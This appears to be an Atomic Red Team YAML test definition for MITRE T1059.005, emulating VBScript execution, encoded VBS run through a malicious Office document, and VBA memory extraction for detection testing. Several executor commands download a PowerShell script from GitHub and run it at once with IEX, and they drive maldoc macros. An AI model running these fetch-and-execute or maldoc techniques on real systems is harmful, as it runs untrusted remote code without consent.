Carrie Roberts
d4709021fb
* updating atomics count in README.md [ci skip] * wip * handle spaces in path * update readme * fix typo --------- Co-authored-by: publish bot <opensource@redcanary.com>
98 lines
4.5 KiB
YAML
98 lines
4.5 KiB
YAML
attack_technique: T1059.005
|
|
display_name: 'Command and Scripting Interpreter: Visual Basic'
|
|
atomic_tests:
|
|
- name: Visual Basic script execution to gather local computer information
|
|
auto_generated_guid: 1620de42-160a-4fe5-bbaf-d3fef0181ce9
|
|
description: |-
|
|
Visual Basic execution test, execute vbscript via PowerShell.
|
|
|
|
When successful, system information will be written to $env:TEMP\T1059.005.out.txt.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
vbscript:
|
|
description: Path to sample script
|
|
type: string
|
|
default: PathToAtomicsFolder\T1059.005\src\sys_info.vbs
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: Sample script must exist on disk at specified location (#{vbscript})
|
|
prereq_command: |
|
|
if (Test-Path "#{vbscript}") {exit 0} else {exit 1}
|
|
get_prereq_command: |-
|
|
New-Item -ItemType Directory (Split-Path "#{vbscript}") -Force | Out-Null
|
|
Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.005/src/sys_info.vbs" -OutFile "#{vbscript}"
|
|
executor:
|
|
command: |
|
|
cscript "#{vbscript}" > $env:TEMP\T1059.005.out.txt
|
|
cleanup_command: |-
|
|
Remove-Item $env:TEMP\T1059.005.out.txt -ErrorAction Ignore
|
|
name: powershell
|
|
|
|
- name: Encoded VBS code execution
|
|
auto_generated_guid: e8209d5f-e42d-45e6-9c2f-633ac4f1eefa
|
|
description: |
|
|
This module takes an encoded VBS script and executes it from within a malicious document. By default, upon successful execution
|
|
a message box will pop up displaying "ART T1059.005"
|
|
|
|
A note regarding this module, due to the way that this module utilizes "ScriptControl" a 64bit version of Microsoft Office is required.
|
|
You can validate this by opening WinWord -> File -> Account -> About Word
|
|
supported_platforms:
|
|
- windows
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
The 64-bit version of Microsoft Office must be installed
|
|
prereq_command: |
|
|
try {
|
|
$wdApp = New-Object -COMObject "Word.Application"
|
|
$path = $wdApp.Path
|
|
Stop-Process -Name "winword"
|
|
if ($path.contains("(x86)")) { exit 1 } else { exit 0 }
|
|
} catch { exit 1 }
|
|
get_prereq_command: |
|
|
Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement"
|
|
executor:
|
|
command: |
|
|
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
|
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
|
|
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec"
|
|
cleanup_command: |
|
|
Get-WmiObject win32_process | Where-Object {$_.CommandLine -like "*mshta*"} | % { "$(Stop-Process $_.ProcessID)" } | Out-Null
|
|
name: powershell
|
|
|
|
- name: Extract Memory via VBA
|
|
auto_generated_guid: 8faff437-a114-4547-9a60-749652a03df6
|
|
description: |
|
|
This module attempts to emulate malware authors utilizing well known techniques to extract data from memory/binary files. To do this
|
|
we first create a string in memory then pull out the pointer to that string. Finally, it uses this pointer to copy the contents of that
|
|
memory location to a file stored in the $env:TEMP\atomic_t1059_005_test_output.bin.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
ms_product:
|
|
description: Maldoc application Word
|
|
type: string
|
|
default: Word
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
Microsoft #{ms_product} must be installed
|
|
prereq_command: |
|
|
try {
|
|
New-Object -COMObject "#{ms_product}.Application" | Out-Null
|
|
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
|
|
Stop-Process -Name $process
|
|
exit 0
|
|
} catch { exit 1 }
|
|
get_prereq_command: |
|
|
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
|
|
executor:
|
|
command: |
|
|
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
|
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
|
|
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059_005-macrocode.txt" -officeProduct "Word" -sub "Extract"
|
|
cleanup_command: |
|
|
Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin" -ErrorAction Ignore
|
|
name: powershell
|